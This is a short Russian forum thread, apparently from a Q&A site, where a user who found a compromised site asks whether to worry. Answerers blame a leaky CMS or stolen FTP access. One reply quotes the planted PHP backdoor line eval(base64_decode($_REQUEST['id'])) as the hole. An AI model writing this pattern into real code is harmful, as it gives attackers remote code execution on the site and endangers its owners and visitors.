Есть причины для беспокойства?

Сергей Стодольский Мастер (1212), на голосовании 9 месяцев назад
Голосование за лучший ответ
Алекс Оракул (85949) 10 месяцев назад
если ты нашел это на своем сайте, то ясное дело что причины есть.
Сергей СтодольскийМастер (1212) 10 месяцев назад
сайт не то чтобы мой, просто просили глянуть почему не робит...ну это уже голимый кабздец... ))))
Алекс Оракул (85949) cms на сайте дырявая и при факте, что владелец тему не рубит, ничего кроме постоянных взламываний сайту не светит.
ВикторМудрец (12388) 10 месяцев назад
Скорее всего либо крякнутый битрикс поставили либо где-то доступ пролупали, фтп и т.д.
step Мастер (1313) 10 месяцев назад
если в коде встречается base64_decode и это писал не ты, то беспокоиться стоит. а у тебя: eval(base64_decode($_REQUEST['id']) - это дыра размером с галактику
так на это я и обратил самое первое внимание, плюс левые папки с кривыми именами, левые файлы....
но вопрос так и остался, откуда эта зараза появилась, тем более что этим сайтом занималась довольно солидная студия, а сам сайт "Портал Тюменского областного поискового центра

СТЕНА ПАМЯТИ"
надеюсь сегодня к обеду подниму сайт..